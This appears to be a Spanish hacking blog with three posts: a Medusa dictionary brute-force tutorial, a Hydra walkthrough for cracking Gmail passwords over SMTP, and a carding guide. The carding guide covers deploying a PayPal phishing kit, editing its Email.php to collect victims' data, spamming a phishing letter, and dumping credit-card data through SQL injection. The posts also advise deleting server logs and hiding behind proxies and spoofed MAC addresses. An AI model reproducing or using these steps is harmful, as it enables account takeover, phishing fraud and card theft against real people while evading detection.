HACKER ANGELWHITE GALC

martes, 29 de abril de 2014

[Medusa] Ataque de fuerza bruta con diccionario


 medi


Seguramente muchos conocen  hydra: una aplicacion para atacar con fuerza bruta  usando diccionarios,  a diferentes servicios como: ssh, ftp,  mysql entre otros,  sin embargo hydra  no se volvió actualizar, su ultima versión fue  lanzada en el 2006 y aunque todavía funciona muy bien,   tiene muchos problemas en la instalación, debido a las dependencias y sus versiones.

No obstante, existe una aplicacion llamada  medusa que es muy similar ( no exactamente igual) a hydra, la cual nos permite crackear por diccionario de forma rápida, masiva y paralela  los siguientes servicios:

  • AFP
  • CVS
  • FTP
  • HTTP
  • IMAP
  • MS-SQL
  • MySQL
  • NetWare NCP
  • NNTP
  • PcAnywhere
  • POP3
  • PostgreSQL
  • REXEC
  • RLOGIN
  • RSH
  • SMBNT
  • SMTP-AUTH
  • SMTP-VRFY
  • SNMP
  • SSHv2
  • Subversion (SVN)
  • Telnet
  • VMware autenticación Daemon (vmauthd)
  • VNC
  • Genérico Wrapper
  • Web Form
Algunas de las caracteristicas que nos tiene medusa son:
  • Velocidad
  • Estabilidad
  • Organizacion del código, para comprenderlo facil
  • diversidad de servicios (como vieron anteriormente)

Instalación de  Medusa

Antes de instalar  medusa, debemos revisar  que se cumplan las siguientes dependencias:
  • OpenSSL
  • LibSSH2
  • NCPFS
  • Libpq
  • Subversion
  • afpfs-ng
Para los usuarios de debian, esta herramienta se encuentra en los repositorios:
apt-get install medusa

Para los demás usuarios descargan las fuentes desde aca, y compilan:
./configure
make
make install

¿Como crackear password con diccionarios usando medusa ?

Lo primero que debemos hacer es  ver los módulos disponibles,  los módulos son los servicios los cuales podemos atacar, para visualizar los módulos:
medusa -d

Después de estar seguros de que tenemos el modulo adecuado al servicio que deseamos atacar, procedemos a lanzar el ataque. Medusa posee una gran cantidad de parámetros (ojala se tomaran el tiempo para leer el man  con detenimiento).  Los parámetros mas importantes son:
-h -> el host víctima
-H -> si tenemos un archivo txt con una lista de hosts
-u  -> el usuario al cual deseamos hacerle el cracking
-U ->  un archivo txt con la lista de posibles usuarios (muy útil si no sabemos que usuarios existen en el sistema)
-P ->  Ubicación del diccionario
-O  -> Crea un archivo log
- e  ns -> Verifica el password vacio o que ambos datos sean lo mismo
-M  -> El modulo que deseamos emplear (sin la extension .mod)
-n -> por si el servicio esta corriendo en otro puerto diferente al default
-s -> Habilita ssl
-f -> detiene el ataque en el instante de encontrar un password valido
-b -> suprime los banners
-v  -> modo verbose (mas informacion level de 0 a 6 siendo el 6 mas alto)

Ahora practiquemos un poco:
medusa -h 127.0.0.1 -u rincon -P /diccionario.txt -M mysql -L -f -b -v 6

Como pueden ver me estoy atacando yo  mismo obviamente me he asegurado que el password se encuentra en el diccionario, el resultado es sorprendente tardo muy poco (10 segundos aproximadamente), el tiempo depende de varios factores como el tamaño del diccionarios y la ubicacion del password encontrado, ya que se va a demorar mucho menos si el password esta al inicio del diccionario de 36000 palabras.

Ahora muchos diran que no es lo mismo hacer un ataque de fuerza bruta con diccionario de forma local  que de forma remota y tienen mucha razon, sin embargo hicimos  la prueba de forma remota  y los resultados fueron muy aceptables, se demoro 6 minutos en encontrar el password en un diccionario de 500 palabras (con esos datos ya pueden hacer la simple regla de 3) atacando  el ssh

Algunos inconvenientes

Todo no es color de rosa, existen algunos inconvenientes que debemos tener en cuenta antes de realizar un ataque de este tipo:
  • No  hay total certeza de encontrar el password, sin embargo la efectividad de un ataque con diccionario es directamente proporcional al tamaño del diccionario, es decir, entre mas grande sea el diccionario mayor sera la probabilidad de  encontrar la contraseña.
  • Otro inconveniente, consiste en que algunos sysadmin inteligentes restringen  el numero de intentos de autenticacion a un numero no mayor a 3, asi que si nos topamos con un servidor serio, no podremos aplicar el ataque por fuerza bruta.
  • Cuando nos encontramos un servidor “vulnerable” a un ataque de fuerza bruta con diccionario, debemos tener muchisimo cuidado, ya que un ataque de esta naturaleza  hace demasiado “RUIDO” es decir, todos los intentos de conexion quedaran guardados en los logs del servidor, por eso es pertinente usar un proxy para hacer el ataque, o  en su defecto borrar los logs, inmediatamente despues de entrar al server.
Fuente: http://www.rinconinformatico.net/

Cómo hacer Hydra (ataque de fuerza bruta) de hackear cualquier E-mail y sacar las Contraseñas

 


Un ataque de contraseña que no intenta descifrar cualquier información, pero siguen probar diferentes contraseñas. Por ejemplo, un ataque de fuerza bruta puede tener un diccionario de todas las palabras o una lista de contraseñas de uso común. Para obtener acceso a una cuenta usando un ataque de fuerza bruta, un programa intenta que todas las palabras disponibles que tiene para obtener acceso a la cuenta. Otro tipo de ataque de fuerza bruta es un programa que se ejecuta a través de todas las letras o letras y números hasta que obtiene un partido. 

Cómo hacer fuerza bruta o (ataque de diccionario)
Así que aquí vamos a utilizar Backtrack 5, Ataque Hydra. Voy a utilizar falsos G-mail a / c para este tutorial. 

Requisitos.
  • Backtrack 4 o 5 con conexión a Internet
  • Archivo Password.txt (que contiene las contraseñas posibles)    
  • Cerebro.

Tomé identificación falsa de G-mail (hackerseven5@gmail.com) como mi víctima  que es la contraseña es '521478963 ', y supongamos que yo sé las posibilidades de la contraseña es así, voy a hacer el archivo password.txt hacer ataque de fuerza bruta como esto  >

Haga clic  en la  imagen  para  ampliar  lo

Ahora es el momento de comenzar el ataque usando Hydra gtk.
Ir a  >  Aplicación  >  Backtrack  >  Escalada de privilegios  >  Ataques de contraseña  >  Ataques en línea  >  hidra gtk.

Haga clic  en la  imagen  para  ampliar  lo

Y va a empezar así>

Haga clic  en la  imagen  para  ampliar  lo

Llene toda la información de esta manera: -


* Solo Target = smtp.gmail.com

* Puerto = 465 
* Protocolo = smtp
Marca * = Usar SSL, ser detallado, Show intentos

Haga clic  en la  imagen  para  ampliar  lo

Después de establecer su destino, vaya en la pestaña Contraseña>

Llene toda la información de esta manera!

* Nombre de usuario = G-mail ID (hackerseven5@gmail.com)
* Lista de passwords = subir su archivo posibilidades contraseña 
(Guardar el archivo password.txt en el escritorio)

Haga clic  en la  imagen  para  ampliar  lo

Después de todo ir a> Start Tab y Clik en Inicio.

Haga clic  en la  imagen  para  ampliar  lo

Así, el Ataque de fuerza bruta se ha iniciado: -

Haga clic  en la  imagen  para  ampliar  lo

Después de todo, va a intentar un ataque de fuerza bruta usando cada contraseña y tratar de iniciar sesión  
con posibilidades contraseña, si tenías suerte! a continuación, se mostrará exitosa  mensaje como este.

Haga clic  en la  imagen  para  ampliar  lo

Yo no uso de este ataque es muy difícil de hackear cualquier G-mail Contraseña, pero puede ayudarle a recuperar su ID hackeado o se olvida la contraseña.
- See more at: http://www.hackw0rm.com/2013/01/how-to-do-hydra-brute-force-attack-to.html#sthash.m9DLNoi7.dpuf


domingo, 27 de abril de 2014

Tutorial de Carding y sus metodos de ataque

 


Últimamente se esta poniendo muy de moda el tema de el " Carding"" a nivel de todo latino América, no hay que ser un profesional ni siquiera  un "Hacker" como dicen muchos por concepto erróneo de este tipo de método  , ya que eh visto a muchas personas que nisiquiera saben hacer un simple " ByPass" or Sql inyeccion metodo POST en los risk entre otros payloads de una simple herramienta como "Sqlmap" o ni muchos menos saben utilizar "Mfsconsole", digo esto porque es la realidad y soy de las personas que digo las cosas como son .
Antes de comenzar los métodos de ataque de este escenario , quiero aclarar que no enseñare a utilizar un proxy u algo, ya que ese post lo tienen en mi "BLOG" , guerra revisada no mata gente bueno sigamos :
SCAMS  + Mailers Spammer 
En este tema tocaremos sobre la plataforma que trabaja el carder y como nosotros podemos tener la nuestra  de una manera  tan sensilla
Pasos  :
  1. Tener un scams actualizado de paypal : 
  2. Tener un Cpanel para subirlo al servidor
 Una ves obtenido estos dos requisitos, vamos a subir nuestro scam mediatnte el "upload" del Cpanel en la opcion " cargar " debemos comprimir nuestro scam en extension " .zip " para que lo descomprima sin ningun problema luego de ello una vez subido nuestro scam :

Una vez subido como vemos en la  imagen nosotros editaremos el archivo " Email.php " y nos saldra este codigo :
<?
$send = "youemail@hotmail.com";  ///////////// CHANGE YOUR EMAIL OK.
?>
nosotros en la parte del correo electronico le pondremos  nuestro correo para que llege los datos  de las personas, pero no creen que seria algo un poco cursi ? tanto si nos rastrean los datos de envios u  otro, bueno perfecto este scam tambien tiene la opcion de guardar los datos en .TXT en la misma we de manera automatica sin modificar nada sigamos.
Ya tenemos nuestro Scam 100 % estable :














Una vez completado ahora lo que haremos sera spamear una lista de correos electronicos que esten con cuentas de paypal / se puede obtener dumpeando un sitio web  que tenga las tablas de paypal y los corrreos electronicos o utilizadno un extractor de correos a una web de "Shop" enlazada con paypal , pero para ello nesesitamos lo siguiente :
  1. Mailer.php para enviar el spam a los correos
  2. Letter en este caso de paypal para enviar el mensaje mediante html
 Les aconsejo que suban el Mailer.php en un servidor aparte , que no este en el mismo servidor del scam ya que el mailer  puede ser quemado facilmente.
Bueno una ves subido el mailer.php lo tendremos de la siguiente manera :
Aqui es donde entra en funcion el " Letter " , el  Letter no es mas que un archivo contenedor del codigo fuente del mensaje que paypal deja en los correos electronicos de los usuarios para  una seria de procesos en la cuenta del usuario :














Antes de pegar el codigo del  lettler debemos modificar algunas cosas por ejemplo el link de la web
donde se direccionara el mensaje en este caso la web de nuestro "Scam "
View Source :
 <html>
    <body>
        <p>
            <a href="http://yourdomaine.com"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>

-------------------------------------------------------------------------------------------------------------------------
Source Edit :

<html>
    <body>
        <p>
            <a href="http://ejemploscam.com/hi"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>
Una ves modificado correctamente llenaremos los datos del email.php , para spamear los correos electronicos :
Requito :
  1. Tener una lista de correos electronicos
  2. Copiar el source del lettler en Message Box :
Ejemplo de datos que se debe poner :











Luego de ello le daremos en " Send eMails ", para que empieze a enviar el mensaje :













 Una vez enviado los mensajes  a la bandeja de entrada del correo, en este caso la victima creera que fue enviado por la misma web de Paypal :














La victima le dara clip en el enlace :
luego de ello la victima caera en nuestra trampa y pondra los datos  de su tarjeta de credito  y su cuenta de paypal  en esta seccion de aqui  : 













Luego que la victima aya puesto todos sus datos y aceptado en las opciones de continuar, automaticamente  se guardara el  registro y se creara una carpeta en nuestro scam llamada  Rezult/CREDIT.txt mas el archivo donde se almacenaran los datos de la tarjeta de credito .











Link de descarga de todo lo utilizado en este proceso :
DUMPEO DE CCV 

el dumpeo de las datos de una tarjeta , no es mas que una inyeccion SQL mediante una herramienta como sqlmap o havij , ya que solo extraeremos los datos que almacene la DB .
Quizas el metodo de hallar es utilizando las "dorks" de google ya que la mayoria las usa para este tipo de ataque  de algunas dork especialmente de Carding ,en este proceso  de ataque es algo comun pero este nos dara $ $ $ .
Primero nesesitamos una web vulnerable en ese caso :
  1. http://www.localhost.com/category.php?cat_id=1 
   
 Una ves extraido la base de datos " la mayoria de tarjetas de credito se encuentren en las Tablas "Orders" o " Shopping_cart " se encuentran los datos de las CCV
Database: db309014570
[15 tables]
+-----------------------+
| categories            |
| contents              |
| login                 |
| orders                |
| orders_temp           |
| ordersp               |
| ordersp_temp          |
| products              |
| resale                |
| resale_temp           |
| shopping_cart_info    |
| shoppingcart          |
| user_credit_cart_info |
| users                 |
| users_wishlist        |
+-----------------------+
Aver entraremos en la tabla " shopping_cart_info " y veamos que nos arroja :


como vemos no ah dado informacion sobre los datos de las CCV , pero si se fijan hay mas tablas donde puede aver mas informacion para sacarle mas jugo a todo ese dinero $ $ $
entraremos a la tabla " users ", ya que estos usuarios registran su datos  para poder comprar productos de la web la cual nos hace tener acceso a este sitio 100 % cardeable tanto de extraccion como para realizar nuestras compras aqui mismo.










como vemos esta web es cardeable internamente, bueno sin mas que decir me despito ante ustedes se me olvida decirles algo , al momento de dumpear y comprar productos les aconsejo uilizar siempre un proxy Socks5 Premium , quizas uno podra decir vaya protego mi IP y listo, pero no mis queridos amigos(a) , la mac juega un rol importante en el soporto de un ordenador de la misma empresa, ya que es su numero  de " SERIE" y pocos le toman importancia  a ello les dejare una herramienta "Premium" para cambiar nuestra Mac de manera manual :
Link de descarga : 
 AGRADESCO EL POS A MI AMIGO OMAR RODIRGUEZ